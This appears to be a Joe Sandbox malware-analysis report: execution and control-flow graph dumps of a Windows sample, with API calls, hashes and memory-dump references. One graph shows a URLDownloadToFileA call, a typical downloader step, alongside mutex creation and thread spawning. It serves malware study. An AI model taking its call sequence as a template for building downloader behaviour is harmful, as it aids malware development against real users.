                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2744216297-0
                                                                                                                                      • Opcode ID: 6b2cf130f7e955beca6159078b6ce6b3345964cf7a049f96ffb579a63912ab3a
                                                                                                                                      • Instruction ID: c23be7726cd72b09e95b9f127cc226f44238aaa3cf4bf4fa2221d435d17d4e4b
                                                                                                                                      • Opcode Fuzzy Hash: 6b2cf130f7e955beca6159078b6ce6b3345964cf7a049f96ffb579a63912ab3a
                                                                                                                                      • Instruction Fuzzy Hash: 86F0AC36504619BBCF622FE5EC04A997F67FB482B1B044550FA2996520D732C9A09BD1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0611C8C8
                                                                                                                                      • ___raise_securityfailure.LIBCMT ref: 0611C9B0
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.509841696.0000000005F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 05F00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.512960522.00000000061AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_5f00000_EgNIXduB6T.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                                      • String ID: nN;
                                                                                                                                      • API String ID: 3761405300-1660531863
                                                                                                                                      • Opcode ID: 6e48e5313e1127c2e57e41e4819196fcd25c0726a56e38d860dcdfc99c69f576
                                                                                                                                      • Instruction ID: d5214b00b89545831d60d25af88c0fa01ae36fc79d37caea2f98e525340d0a7d
                                                                                                                                      • Opcode Fuzzy Hash: 6e48e5313e1127c2e57e41e4819196fcd25c0726a56e38d860dcdfc99c69f576
                                                                                                                                      • Instruction Fuzzy Hash: EC21DDB46403009EE788CF14E199A607BF6BF48314F14412AEF098A290E7B895C4CF88
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:96.9%
                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                      Signature Coverage:100%
                                                                                                                                      Total number of Nodes:3
                                                                                                                                      Total number of Limit Nodes:0

                                                                                                                                      Callgraph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      • Opacity -> Relevance
                                                                                                                                      • Disassembly available
                                                                                                                                      callgraph 0 Function_02100000

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 0 2100000-2100065 URLDownloadToFileA 2 2100081-2100084 0->2 3 2100067-210007c 0->3 3->2
                                                                                                                                      APIs
                                                                                                                                      • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0210005A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000001.00000002.508330039.0000000002100000.00000040.00000400.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_1_2_2100000_wJpTOIbAbrslKXUFtgsTdnp.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: DownloadFile
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1407266417-0
                                                                                                                                      • Opcode ID: bf5559702610324e4bef6c352f2006c859b30d308efa96414a2a150319264c7f
                                                                                                                                      • Instruction ID: 231680ca42922db3860b7a81c9f7533bd54b3dbfa92529ad094811f8f4562997
                                                                                                                                      • Opcode Fuzzy Hash: bf5559702610324e4bef6c352f2006c859b30d308efa96414a2a150319264c7f
                                                                                                                                      • Instruction Fuzzy Hash: 8811FE74A40209AFDB04CF94C885FAEBBB5FF48745F148169FD48AB381D670AA40CFA4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:8.1%
                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                      Signature Coverage:8.8%
                                                                                                                                      Total number of Nodes:2000
                                                                                                                                      Total number of Limit Nodes:26
                                                                                                                                      execution_graph 23587 13138b9 23588 13138c5 CallCatchBlock 23587->23588 23590 13138fc __wsopen_s 23588->23590 23595 1316856 EnterCriticalSection 23588->23595 23591 13138d9 23592 131b0e0 __fassign 20 API calls 23591->23592 23593 13138e9 23592->23593 23596 1313902 23593->23596 23595->23591 23599 131689e LeaveCriticalSection 23596->23599 23598 1313909 23598->23590 23599->23598 23257 130e428 23267 1314e5b 23257->23267 23261 130e435 23262 1314f3c 20 API calls 23261->23262 23263 130e444 DeleteCriticalSection 23262->23263 23263->23261 23264 130e45f 23263->23264 23265 1314615 _free 20 API calls 23264->23265 23266 130e46a 23265->23266 23280 1314e64 23267->23280 23269 130e430 23270 1314d0e 23269->23270 23271 1314d1a CallCatchBlock 23270->23271 23300 1316856 EnterCriticalSection 23271->23300 23273 1314d90 23314 1314da5 23273->23314 23275 1314d25 23275->23273 23277 1314d64 DeleteCriticalSection 23275->23277 23301 131692b 23275->23301 23276 1314d9c __wsopen_s 23276->23261 23278 1314615 _free 20 API calls 23277->23278 23278->23275 23281 1314e70 CallCatchBlock 23280->23281 23290 1316856 EnterCriticalSection 23281->23290 23283 1314f13 23295 1314f33 23283->23295 23286 1314e7f 23286->23283 23289 1314e14 66 API calls 23286->23289 23291 130e474 EnterCriticalSection 23286->23291 23292 1314f09 23286->23292 23288 1314f1f __wsopen_s 23288->23269 23289->23286 23290->23286 23291->23286 23298 130e488 LeaveCriticalSection 23292->23298 23294 1314f11 23294->23286 23299 131689e LeaveCriticalSection 23295->23299 23297 1314f3a 23297->23288 23298->23294 23299->23297 23300->23275 23302 1316937 CallCatchBlock 23301->23302 23303 1316948 23302->23303 23304 131695d 23302->23304 23305 1313cd1 __dosmaperr 20 API calls 23303->23305 23313 1316958 __wsopen_s 23304->23313 23317 130e474 EnterCriticalSection 23304->23317 23306 131694d 23305->23306 23308 13110b9 __cftof 26 API calls 23306->23308 23308->23313 23309 1316979 23310 13168b5 65 API calls 23309->23310 23311 1316984 23310->23311 23318 13169a1 23311->23318 23313->23275 23322 131689e LeaveCriticalSection 23314->23322 23316 1314dac 23316->23276 23317->23309 23321 130e488 LeaveCriticalSection 23318->23321 23320 13169a9 23320->23313 23321->23320 23322->23316 22817 1312c2b 22818 1312c4d 22817->22818 22820 1312c34 22817->22820 22819 1312c3c 22820->22819 22824 1312c89 22820->22824 22822 1312c44 22822->22819 22837 1312f30 22822->22837 22825 1312c92 22824->22825 22826 1312c95 22824->22826 22825->22822 22827 1319586 51 API calls 22826->22827 22828 1312c9c 22827->22828 22847 1319979 GetEnvironmentStringsW 22828->22847 22831 1312ca7 22833 1314615 _free 20 API calls 22831->22833 22834 1312cdc 22833->22834 22834->22822 22835 1312cb2 22836 1314615 _free 20 API calls 22835->22836 22836->22831 22838 1312f3d 22837->22838 22846 1312f42 22837->22846 22838->22818 22839 1312f48 WideCharToMultiByte 22840 1312f9d 22839->22840 22839->22846 22840->22818 22841 13145b8 __dosmaperr 20 API calls 22841->22846 22842 1312fa3 22844 1314615 _free 20 API calls 22842->22844 22843 1312f6e WideCharToMultiByte 22843->22842 22843->22846 22844->22840 22845 1314615 _free 20 API calls 22845->22846 22846->22839 22846->22840 22846->22841 22846->22842 22846->22843 22846->22845 22848 1319990 22847->22848 22858 13199e3 22847->22858 22851 1319996 WideCharToMultiByte 22848->22851 22849 1312ca1 22849->22831 22859 1312d36 22849->22859 22850 13199ec FreeEnvironmentStringsW 22850->22849 22852 13199b2 22851->22852 22851->22858 22853 13151cd _strftime 21 API calls 22852->22853 22854 13199b8 22853->22854 22855 13199d5 22854->22855 22856 13199bf WideCharToMultiByte 22854->22856 22857 1314615 _free 20 API calls 22855->22857 22856->22855 22857->22858 22858->22849 22858->22850 22860 1312d4b 22859->22860 22861 13145b8 __dosmaperr 20 API calls 22860->22861 22870 1312d72 22861->22870 22862 1312dd6 22863 1314615 _free 20 API calls 22862->22863 22864 1312df0 22863->22864 22864->22835 22865 13145b8 __dosmaperr 20 API calls 22865->22870 22866 1312dd8 22876 1312f01 22866->22876 22867 1313aef ___std_exception_copy 26 API calls 22867->22870 22870->22862 22870->22865 22870->22866 22870->22867 22871 1312dfa 22870->22871 22874 1314615 _free 20 API calls 22870->22874 22873 13110e6 __cftof 11 API calls 22871->22873 22872 1314615 _free 20 API calls 22872->22862 22875 1312e06 22873->22875 22874->22870 22877 1312dde 22876->22877 22878 1312f0e 22876->22878 22877->22872 22879 1312f25 22878->22879 22880 1314615 _free 20 API calls 22878->22880 22881 1314615 _free 20 API calls 22879->22881 22880->22878 22881->22877 19028 1309d0a 19029 1309d16 CallCatchBlock 19028->19029 19060 1309a0d 19029->19060 19031 1309d1d 19032 1309e70 19031->19032 19035 1309d47 19031->19035 19305 1309e90 IsProcessorFeaturePresent 19032->19305 19034 1309e77 19309 131291c 19034->19309 19044 1309d86 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 19035->19044 19071 131372f 19035->19071 19042 1309d66 19050 1309de7 19044->19050 19288 13128e4 19044->19288 19079 1309faa 19050->19079 19055 1309e0d 19056 1309e16 19055->19056 19296 13128bf 19055->19296 19299 1309b9c 19056->19299 19061 1309a16 19060->19061 19315 130a0f9 IsProcessorFeaturePresent 19061->19315 19065 1309a27 19066 1309a2b 19065->19066 19326 13135bc 19065->19326 19066->19031 19069 1309a42 19069->19031 19072 1313746 19071->19072 19073 130a07b _ValidateLocalCookies 5 API calls 19072->19073 19074 1309d60 19073->19074 19074->19042 19075 13136d3 19074->19075 19076 1313702 19075->19076 19077 130a07b _ValidateLocalCookies 5 API calls 19076->19077 19078 131372b 19077->19078 19078->19044 19462 130c510 19079->19462 19081 1309fbd GetStartupInfoW 19082 1309ded 19081->19082 19083 1313680 19082->19083 19464 1319586 19083->19464 19085 1313689 19087 1309df6 19085->19087 19468 1319911 19085->19468 19088 13057e4 19087->19088 19769 1306ead 20 API calls 19088->19769 19090 13057f9 19770 1307017 19090->19770 19092 1305802 19093 130580f 19092->19093 19784 130296e 19092->19784 19094 13028af 26 API calls 19093->19094 19096 1305818 19094->19096 19294 1309fe3 GetModuleHandleW 19096->19294 19098 130296e 28 API calls 19099 1305843 19098->19099 19788 13072d8 19099->19788 19103 1305855 19813 1304c09 19103->19813 19105 1305865 19818 13027e1 19105->19818 19107 1305876 19108 130587f CreateMutexW GetLastError 19107->19108 19109 13058a6 19108->19109 19110 1305898 19108->19110 19822 1307c21 19109->19822 19112 1302755 26 API calls 19110->19112 19112->19093 19115 13058ba 19839 1302755 19115->19839 19117 13058c3 19118 1304c09 28 API calls 19117->19118 19119 13058cf 19118->19119 19120 13027e1 28 API calls 19119->19120 19121 13058e0 19120->19121 19843 130326c 19121->19843 19123 13058f2 19846 13031ae 19123->19846 19125 13058fe 19126 130275a 26 API calls 19125->19126 19127 130590a 19126->19127 19128 1302755 26 API calls 19127->19128 19129 1305913 19128->19129 19130 1302755 26 API calls 19129->19130 19131 130591f 19130->19131 19132 1302755 26 API calls 19131->19132 19133 1305928 GetModuleFileNameW 19132->19133 19134 1305945 19133->19134 19135 1304c09 28 API calls 19134->19135 19136 130594c 19135->19136 19137 1304c09 28 API calls 19136->19137 19138 1305962 19137->19138 19139 1304c09 28 API calls 19138->19139 19140 1305978 19139->19140 19141 1305988 19140->19141 19143 1305a59 19140->19143 19142 1304c09 28 API calls 19141->19142 19145 130598f 19142->19145 19144 1305a7b 19143->19144 20050 1305e77 AllocConsole GetConsoleWindow 19143->20050 19147 1304c09 28 API calls 19144->19147 19149 1304c09 28 API calls 19145->19149 19148 1305a87 19147->19148 19150 130296e 28 API calls 19148->19150 19151 13059aa 19149->19151 19152 1305a8f 19150->19152 19154 1304c09 28 API calls 19151->19154 19849 13075d8 19152->19849 19156 13059be 19154->19156 19155 1305a9c 19853 13061d6 19155->19853 19158 1304c09 28 API calls 19156->19158 19161 13059d2 19158->19161 19164 1304c09 28 API calls 19161->19164 19162 1305ab6 19163 1304c09 28 API calls 19162->19163 19167 1305abd 19163->19167 19165 13059e3 19164->19165 19170 1304c09 28 API calls 19165->19170 19166 1305bba 19169 1304c09 28 API calls 19166->19169 19167->19166 19168 1304c09 28 API calls 19167->19168 19171 1305ad5 19168->19171 19172 1305bc4 19169->19172 19173 13059f3 19170->19173 19174 1304c09 28 API calls 19171->19174 19175 1305c9c 19172->19175 19176 1305bdf 19172->19176 19180 1304c09 28 API calls 19173->19180 19178 1305aea 19174->19178 19177 1304c09 28 API calls 19175->19177 19179 1309967 22 API calls 19176->19179 19187 1305ca4 19177->19187 19183 1304c09 28 API calls 19178->19183 19181 1305be6 19179->19181 19182 1305a35 19180->19182 19185 1304c09 28 API calls 19181->19185 19189 1304c09 28 API calls 19182->19189 19184 1305afe 19183->19184 19194 1304c09 28 API calls 19184->19194 19188 1305bf9 19185->19188 19186 1305d72 CreateThread 19190 1304c09 28 API calls 19186->19190 22346 13052dd 19186->22346 19187->19186 19191 1309967 22 API calls 19187->19191 19196 1311ad3 _strftime 42 API calls 19188->19196 19192 1305a44 19189->19192 19200 1305d85 19190->19200 19193 1305cbb 19191->19193 19925 1304dc5 19192->19925 19197 1304c09 28 API calls 19193->19197 19195 1305b0e 19194->19195 19207 1304c09 28 API calls 19195->19207 19198 1305c06 19196->19198 19202 1305ccf 19197->19202 19203 1304c09 28 API calls 19198->19203 19201 1305dd9 19200->19201 19205 1304c09 28 API calls 19200->19205 19206 1304c09 28 API calls 19201->19206 19211 1311ad3 _strftime 42 API calls 19202->19211 19208 1305c11 19203->19208 19204 1305a54 19204->19143 19212 1305d98 19205->19212 19209 1305de0 19206->19209 19210 1305b1f 19207->19210 19215 1311ad3 _strftime 42 API calls 19208->19215 19213 1304c09 28 API calls 19209->19213 19219 1304c09 28 API calls 19210->19219 19214 1305cdc 19211->19214 19212->19201 19216 1304c09 28 API calls 19212->19216 19217 1305df0 19213->19217 19218 1304c09 28 API calls 19214->19218 19220 1305c1e 19215->19220 19221 1305dab 19216->19221 19226 1304c09 28 API calls 19217->19226 19222 1305ce7 19218->19222 19223 1305b34 19219->19223 19224 1304c09 28 API calls 19220->19224 19221->19201 19227 1305db7 Sleep 19221->19227 19229 1311ad3 _strftime 42 API calls 19222->19229 19230 1304c09 28 API calls 19223->19230 19225 1305c2c 19224->19225 19232 1304c09 28 API calls 19225->19232 19228 1305e00 19226->19228 19233 1302755 26 API calls 19227->19233 19240 1304c09 28 API calls 19228->19240 19234 1305cf4 19229->19234 19231 1305b49 19230->19231 19235 130296e 28 API calls 19231->19235 19246 1305c3f 19232->19246 19236 1305dc8 19233->19236 19237 1304c09 28 API calls 19234->19237 19238 1305b51 19235->19238 19239 13028af 26 API calls 19236->19239 19241 1305d02 19237->19241 19242 1304c09 28 API calls 19238->19242 19243 1305dd1 19239->19243 19244 1305e15 19240->19244 19247 1304c09 28 API calls 19241->19247 19245 1305b68 19242->19245 19243->19201 19907 1302917 19244->19907 19250 1304c09 28 API calls 19245->19250 19248 1304c09 28 API calls 19246->19248 19255 1305d15 19247->19255 19256 1305c56 19248->19256 19252 1305b80 19250->19252 19863 1311ad3 19252->19863 19253 1304c09 28 API calls 19254 1305e2b 19253->19254 19257 1304c09 28 API calls 19255->19257 19261 1304c09 28 API calls 19256->19261 19268 1305d2c 19257->19268 19264 1305c6d 19261->19264 19269 1311ad3 _strftime 42 API calls 19264->19269 19272 1304c09 28 API calls 19268->19272 19271 1305c7a 19269->19271 19274 1304c09 28 API calls 19271->19274 19276 1305d43 19272->19276 19277 1305c84 19274->19277 19280 1311ad3 _strftime 42 API calls 19276->19280 19284 1305d50 19280->19284 19285 1304c09 28 API calls 19284->19285 19289 131290c pre_c_initialization IsInExceptionSpec 19288->19289 19289->19050 19290 131440f pre_c_initialization 38 API calls 19289->19290 19293 13139b9 19290->19293 19291 1313b49 _abort 38 API calls 19292 13139e3 19291->19292 19293->19291 19295 1309e09 19294->19295 19295->19034 19295->19055 22735 1312699 19296->22735 19300 1309ba8 19299->19300 19301 1309bbe 19300->19301 22810 13135ce 19300->22810 19301->19042 19304 130c835 ___vcrt_uninitialize 8 API calls 19304->19301 19306 1309ea5 ___scrt_fastfail 19305->19306 19307 1309f50 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19306->19307 19308 1309f9b ___scrt_fastfail 19307->19308 19308->19034 19310 1312699 _abort 28 API calls 19309->19310 19311 1309e7d 19310->19311 19312 13128ce 19311->19312 19313 1312699 _abort 28 API calls 19312->19313 19314 1309e85 19313->19314 19316 1309a22 19315->19316 19317 130c80c 19316->19317 19318 130c811 ___vcrt_initialize_winapi_thunks 19317->19318 19337 130d8d9 19318->19337 19321 130c81f 19321->19065 19323 130c827 19324 130c832 19323->19324 19351 130d915 19323->19351 19324->19065 19392 131a187 19326->19392 19329 130c835 19330 130c84f 19329->19330 19331 130c83e 19329->19331 19330->19066 19332 130cb22 ___vcrt_uninitialize_ptd 6 API calls 19331->19332 19333 130c843 19332->19333 19334 130d915 ___vcrt_uninitialize_locks DeleteCriticalSection 19333->19334 19335 130c848 19334->19335 19458 130dbd6 19335->19458 19339 130d8e2 19337->19339 19340 130d90b 19339->19340 19341 130c81b 19339->19341 19355 130db66 19339->19355 19342 130d915 ___vcrt_uninitialize_locks DeleteCriticalSection 19340->19342 19341->19321 19343 130caef 19341->19343 19342->19341 19373 130da77 19343->19373 19346 130cb04 19346->19323 19349 130cb1f 19349->19323 19352 130d93f 19351->19352 19353 130d920 19351->19353 19352->19321 19354 130d92a DeleteCriticalSection 19353->19354 19354->19352 19354->19354 19360 130da08 19355->19360 19357 130db80 19358 130db89 19357->19358 19359 130db9e InitializeCriticalSectionAndSpinCount 19357->19359 19358->19339 19359->19358 19361 130da30 19360->19361 19365 130da2c __crt_fast_encode_pointer 19360->19365 19361->19365 19366 130d944 19361->19366 19364 130da4a GetProcAddress 19364->19365 19365->19357 19371 130d953 try_get_first_available_module 19366->19371 19367 130d9fd 19367->19364 19367->19365 19368 130d970 LoadLibraryExW 19369 130d98b GetLastError 19368->19369 19368->19371 19369->19371 19370 130d9e6 FreeLibrary 19370->19371 19371->19367 19371->19368 19371->19370 19372 130d9be LoadLibraryExW 19371->19372 19372->19371 19374 130da08 try_get_function 5 API calls 19373->19374 19375 130da91 19374->19375 19376 130daaa TlsAlloc 19375->19376 19377 130caf9 19375->19377 19377->19346 19378 130db28 19377->19378 19379 130da08 try_get_function 5 API calls 19378->19379 19380 130db42 19379->19380 19381 130db5d TlsSetValue 19380->19381 19382 130cb12 19380->19382 19381->19382 19382->19349 19383 130cb22 19382->19383 19384 130cb32 19383->19384 19385 130cb2c 19383->19385 19384->19346 19387 130dab2 19385->19387 19388 130da08 try_get_function 5 API calls 19387->19388 19389 130dacc 19388->19389 19390 130dae4 TlsFree 19389->19390 19391 130dad8 19389->19391 19390->19391 19391->19384 19393 131a1a4 19392->19393 19396 131a1a0 19392->19396 19393->19396 19398 13150e6 19393->19398 19394 130a07b _ValidateLocalCookies 5 API calls 19395 1309a34 19394->19395 19395->19069 19395->19329 19396->19394 19399 13150f2 CallCatchBlock 19398->19399 19410 1316856 EnterCriticalSection 19399->19410 19401 13150f9 19411 131a655 19401->19411 19403 1315108 19404 1315117 19403->19404 19424 1314f7a GetStartupInfoW 19403->19424 19435 1315133 19404->19435 19408 1315128 __wsopen_s 19408->19393 19410->19401 19412 131a661 CallCatchBlock 19411->19412 19413 131a685 19412->19413 19414 131a66e 19412->19414 19438 1316856 EnterCriticalSection 19413->19438 19415 1313cd1 __dosmaperr 20 API calls 19414->19415 19417 131a673 19415->19417 19418 13110b9 __cftof 26 API calls 19417->19418 19419 131a67d __wsopen_s 19418->19419 19419->19403 19420 131a6bd 19446 131a6e4 19420->19446 19423 131a691 19423->19420 19439 131a5a6 19423->19439 19425 1314f97 19424->19425 19426 1315029 19424->19426 19425->19426 19427 131a655 27 API calls 19425->19427 19430 1315030 19426->19430 19428 1314fc0 19427->19428 19428->19426 19429 1314fee GetFileType 19428->19429 19429->19428 19432 1315037 19430->19432 19431 131507a GetStdHandle 19431->19432 19432->19431 19433 13150e2 19432->19433 19434 131508d GetFileType 19432->19434 19433->19404 19434->19432 19457 131689e LeaveCriticalSection 19435->19457 19437 131513a 19437->19408 19438->19423 19440 13145b8 __dosmaperr 20 API calls 19439->19440 19441 131a5b8 19440->19441 19445 131a5c5 19441->19445 19449 1314ae5 19441->19449 19442 1314615 _free 20 API calls 19443 131a617 19442->19443 19443->19423 19445->19442 19456 131689e LeaveCriticalSection 19446->19456 19448 131a6eb 19448->19419 19450 1314669 __dosmaperr 5 API calls 19449->19450 19451 1314b0c 19450->19451 19452 1314b2a InitializeCriticalSectionAndSpinCount 19451->19452 19455 1314b15 19451->19455 19452->19455 19453 130a07b _ValidateLocalCookies 5 API calls 19454 1314b41 19453->19454 19454->19441 19455->19453 19456->19448 19457->19437 19459 130dbdf 19458->19459 19461 130dc05 19458->19461 19460 130dbef FreeLibrary 19459->19460 19459->19461 19460->19459 19461->19330 19463 130c527 19462->19463 19463->19081 19463->19463 19465 1319598 19464->19465 19466 131958f 19464->19466 19465->19085 19471 1319485 19466->19471 19766 13198b8 19468->19766 19491 131440f GetLastError 19471->19491 19473 1319492 19511 13195a4 19473->19511 19475 131949a 19520 1319219 19475->19520 19478 13194b1 19478->19465 19481 13194f4 19484 1314615 _free 20 API calls 19481->19484 19484->19478 19485 13194ef 19486 1313cd1 __dosmaperr 20 API calls 19485->19486 19486->19481 19487 1319538 19487->19481 19544 13190ef 19487->19544 19488 131950c 19488->19487 19489 1314615 _free 20 API calls 19488->19489 19489->19487 19492 131442b 19491->19492 19493 1314425 19491->19493 19495 13145b8 __dosmaperr 20 API calls 19492->19495 19496 131447a SetLastError 19492->19496 19494 13148ee __dosmaperr 11 API calls 19493->19494 19494->19492 19498 131443d 19495->19498 19496->19473 19497 1314445 19500 1314615 _free 20 API calls 19497->19500 19498->19497 19499 1314944 __dosmaperr 11 API calls 19498->19499 19501 131445a 19499->19501 19502 131444b 19500->19502 19501->19497 19503 1314461 19501->19503 19504 1314486 SetLastError 19502->19504 19505 1314281 __dosmaperr 20 API calls 19503->19505 19547 1313b49 19504->19547 19507 131446c 19505->19507 19508 1314615 _free 20 API calls 19507->19508 19510 1314473 19508->19510 19510->19496 19510->19504 19512 13195b0 CallCatchBlock 19511->19512 19513 131440f pre_c_initialization 38 API calls 19512->19513 19518 13195ba 19513->19518 19515 131963e __wsopen_s 19515->19475 19517 1313b49 _abort 38 API calls 19517->19518 19518->19515 19518->19517 19519 1314615 _free 20 API calls 19518->19519 19615 1316856 EnterCriticalSection 19518->19615 19616 1319635 19518->19616 19519->19518 19620 130e1a2 19520->19620 19523 131923a GetOEMCP 19526 1319263 19523->19526 19524 131924c 19525 1319251 GetACP 19524->19525 19524->19526 19525->19526 19526->19478 19527 13151cd 19526->19527 19528 131520b 19527->19528 19532 13151db _strftime 19527->19532 19530 1313cd1 __dosmaperr 20 API calls 19528->19530 19529 13151f6 RtlAllocateHeap 19531 1315209 19529->19531 19529->19532 19530->19531 19531->19481 19534 1319646 19531->19534 19532->19528 19532->19529 19533 131245e _strftime 7 API calls 19532->19533 19533->19532 19535 1319219 40 API calls 19534->19535 19536 1319665 19535->19536 19538 13196b6 IsValidCodePage 19536->19538 19541 131966c 19536->19541 19543 13196db ___scrt_fastfail 19536->19543 19537 130a07b _ValidateLocalCookies 5 API calls 19539 13194e7 19537->19539 19540 13196c8 GetCPInfo 19538->19540 19538->19541 19539->19485 19539->19488 19540->19541 19540->19543 19541->19537 19657 13192f1 GetCPInfo 19543->19657 19730 13190ac 19544->19730 19546 1319113 19546->19481 19558 131a343 19547->19558 19550 1313b59 19552 1313b63 IsProcessorFeaturePresent 19550->19552 19553 1313b81 19550->19553 19554 1313b6e 19552->19554 19555 13128ce _abort 28 API calls 19553->19555 19557 1310eef _abort 8 API calls 19554->19557 19556 1313b8b 19555->19556 19557->19553 19588 131a2b1 19558->19588 19561 131a39e 19562 131a3aa IsInExceptionSpec 19561->19562 19563 131a3d1 _abort 19562->19563 19564 1314493 __dosmaperr 20 API calls 19562->19564 19567 131a3d7 _abort 19562->19567 19565 131a423 19563->19565 19563->19567 19568 131a406 19563->19568 19564->19563 19566 1313cd1 __dosmaperr 20 API calls 19565->19566 19569 131a428 19566->19569 19574 131a44f 19567->19574 19602 1316856 EnterCriticalSection 19567->19602 19611 1322cc9 19568->19611 19570 13110b9 __cftof 26 API calls 19569->19570 19570->19568 19576 131a4ae 19574->19576 19578 131a4a6 19574->19578 19585 131a4d9 19574->19585 19603 131689e LeaveCriticalSection 19574->19603 19576->19585 19604 131a395 19576->19604 19579 13128ce _abort 28 API calls 19578->19579 19579->19576 19582 131440f pre_c_initialization 38 API calls 19586 131a53c 19582->19586 19584 131a395 _abort 38 API calls 19584->19585 19607 131a55e 19585->19607 19586->19568 19587 131440f pre_c_initialization 38 API calls 19586->19587 19587->19568 19591 131a257 19588->19591 19590 1313b4e 19590->19550 19590->19561 19592 131a263 CallCatchBlock 19591->19592 19597 1316856 EnterCriticalSection 19592->19597 19594 131a271 19598 131a2a5 19594->19598 19596 131a298 __wsopen_s 19596->19590 19597->19594 19601 131689e LeaveCriticalSection 19598->19601 19600 131a2af 19600->19596 19601->19600 19602->19574 19603->19578 19605 131440f pre_c_initialization 38 API calls 19604->19605 19606 131a39a 19605->19606 19606->19584 19608 131a564 19607->19608 19609 131a52d 19607->19609 19614 131689e LeaveCriticalSection 19608->19614 19609->19568 19609->19582 19609->19586 19612 130a07b _ValidateLocalCookies 5 API calls 19611->19612 19613 1322cd4 19612->19613 19613->19613 19614->19609 19615->19518 19619 131689e LeaveCriticalSection 19616->19619 19618 131963c 19618->19518 19619->19618 19621 130e1bf 19620->19621 19627 130e1b5 19620->19627 19622 131440f pre_c_initialization 38 API calls 19621->19622 19621->19627 19623 130e1e0 19622->19623 19628 131455e 19623->19628 19627->19523 19627->19524 19629 130e1f9 19628->19629 19630 1314571 19628->19630 19632 131458b 19629->19632 19630->19629 19636 131b069 19630->19636 19633 13145b3 19632->19633 19634 131459e 19632->19634 19633->19627 19634->19633 19635 13195a4 __fassign 38 API calls 19634->19635 19635->19633 19637 131b075 CallCatchBlock 19636->19637 19638 131440f pre_c_initialization 38 API calls 19637->19638 19639 131b07e 19638->19639 19643 131b0cc __wsopen_s 19639->19643 19648 1316856 EnterCriticalSection 19639->19648 19641 131b09c 19649 131b0e0 19641->19649 19643->19629 19647 1313b49 _abort 38 API calls 19647->19643 19648->19641 19650 131b0b0 19649->19650 19651 131b0ee __fassign 19649->19651 19653 131b0cf 19650->19653 19651->19650 19652 131ae1c __fassign 20 API calls 19651->19652 19652->19650 19656 131689e LeaveCriticalSection 19653->19656 19655 131b0c3 19655->19643 19655->19647 19656->19655 19658 13193d5 19657->19658 19659 131932b 19657->19659 19661 130a07b _ValidateLocalCookies 5 API calls 19658->19661 19667 131ac82 19659->19667 19664 1319481 19661->19664 19664->19541 19666 1314032 43 API calls 19666->19658 19668 130e1a2 __fassign 38 API calls 19667->19668 19669 131aca2 MultiByteToWideChar 19668->19669 19671 131ad78 19669->19671 19672 131ace0 19669->19672 19673 130a07b _ValidateLocalCookies 5 API calls 19671->19673 19674 13151cd _strftime 21 API calls 19672->19674 19677 131ad01 _strftime ___scrt_fastfail 19672->19677 19675 131938c 19673->19675 19674->19677 19681 1314032 19675->19681 19676 131ad72 19686 131407d 19676->19686 19677->19676 19679 131ad46 MultiByteToWideChar 19677->19679 19679->19676 19680 131ad62 GetStringTypeW 19679->19680 19680->19676 19682 130e1a2 __fassign 38 API calls 19681->19682 19683 1314045 19682->19683 19690 1313e15 19683->19690 19687 1314089 19686->19687 19688 131409a 19686->19688 19687->19688 19689 1314615 _free 20 API calls 19687->19689 19688->19671 19689->19688 19692 1313e30 19690->19692 19691 1313e56 MultiByteToWideChar 19693 1313e80 19691->19693 19694 131400a 19691->19694 19692->19691 19697 13151cd _strftime 21 API calls 19693->19697 19701 1313ea1 _strftime 19693->19701 19695 130a07b _ValidateLocalCookies 5 API calls 19694->19695 19696 131401d 19695->19696 19696->19666 19697->19701 19698 1313f56 19703 131407d __freea 20 API calls 19698->19703 19699 1313eea MultiByteToWideChar 19699->19698 19700 1313f03 19699->19700 19717 1314b47 19700->19717 19701->19698 19701->19699 19703->19694 19705 1313f65 19707 13151cd _strftime 21 API calls 19705->19707 19710 1313f86 _strftime 19705->19710 19706 1313f2d 19706->19698 19708 1314b47 _strftime 11 API calls 19706->19708 19707->19710 19708->19698 19709 1313ffb 19712 131407d __freea 20 API calls 19709->19712 19710->19709 19711 1314b47 _strftime 11 API calls 19710->19711 19713 1313fda 19711->19713 19712->19698 19713->19709 19714 1313fe9 WideCharToMultiByte 19713->19714 19714->19709 19715 1314029 19714->19715 19716 131407d __freea 20 API calls 19715->19716 19716->19698 19718 1314669 __dosmaperr 5 API calls 19717->19718 19719 1314b6e 19718->19719 19722 1314b77 19719->19722 19725 1314bcf 19719->19725 19723 130a07b _ValidateLocalCookies 5 API calls 19722->19723 19724 1313f1a 19723->19724 19724->19698 19724->19705 19724->19706 19726 1314669 __dosmaperr 5 API calls 19725->19726 19727 1314bf6 _strftime 19726->19727 19728 130a07b _ValidateLocalCookies 5 API calls 19727->19728 19729 1314bb7 LCMapStringW 19728->19729 19729->19722 19731 13190b8 